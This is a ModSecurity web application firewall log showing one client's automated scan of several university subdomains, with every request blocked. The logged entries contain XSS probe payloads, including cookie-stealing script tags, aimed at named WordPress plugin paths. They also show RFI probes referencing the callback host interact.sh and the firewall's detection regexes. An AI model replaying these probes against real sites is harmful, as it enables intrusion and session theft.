[Tue Aug 29 11:53:41.937101 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAo3IfsAAAAa"]
[Tue Aug 29 11:53:41.956072 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAfWOZEAAAAL"]
[Tue Aug 29 11:53:42.575535 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAo2m6MAAAAA"]
[Tue Aug 29 11:53:42.656788 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoLfWIAAAAG"]
[Tue Aug 29 11:53:42.662315 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoPuc4AAAAM"]
[Tue Aug 29 11:53:42.671356 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAowNssAAAAH"]
[Tue Aug 29 11:53:42.677095 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAApHRVQAAAAP"]
[Tue Aug 29 11:53:42.684155 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoz74MAAAAS"]
[Tue Aug 29 11:53:42.684700 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoAk1oAAAAC"]
[Tue Aug 29 11:53:42.777706 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoPuc8AAAAM"]
[Tue Aug 29 11:53:42.794428 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoz74QAAAAS"]
[Tue Aug 29 11:53:42.823451 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAowNs0AAAAH"]
[Tue Aug 29 11:53:43.548938 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO1518Co-f0AAAoW7TwAAAAJ"]
[Tue Aug 29 11:53:43.549002 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAnHQtwAAAAT"]
[Tue Aug 29 11:53:43.596942 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAApJDSwAAAAY"]
[Tue Aug 29 11:53:43.601233 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAnHQt0AAAAT"]
[Tue Aug 29 11:53:43.718707 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAofm9wAAAAX"]
[Tue Aug 29 11:53:43.719262 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoyG1MAAAAI"]
[Tue Aug 29 11:53:43.719696 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoGFeoAAAAE"]
[Tue Aug 29 11:53:43.734069 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoPudMAAAAM"]
[Tue Aug 29 11:53:43.747557 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAApHRVoAAAAP"]
[Tue Aug 29 11:53:43.748103 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAolKY8AAAAe"]
[Tue Aug 29 11:53:43.756353 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAApJDS4AAAAY"]
[Tue Aug 29 11:53:44.561111 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO152MCo-f0AAAoPudQAAAAM"]
[Tue Aug 29 11:53:44.573730 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO152MCo-f0AAAoesQ4AAAAV"]
[Tue Aug 29 11:53:45.532730 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAApHRV0AAAAP"]
[Tue Aug 29 11:53:45.536617 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoz74sAAAAS"]
[Tue Aug 29 11:53:45.537575 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAo3IgYAAAAa"]
[Tue Aug 29 11:53:45.544722 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAn409MAAAAW"]
[Tue Aug 29 11:53:45.556497 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAApHRV4AAAAP"]
[Tue Aug 29 11:53:45.559166 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAot8TEAAAAn"]
[Tue Aug 29 11:53:45.564798 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoz74wAAAAS"]
[Tue Aug 29 11:53:45.619084 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAox7JoAAAAN"]
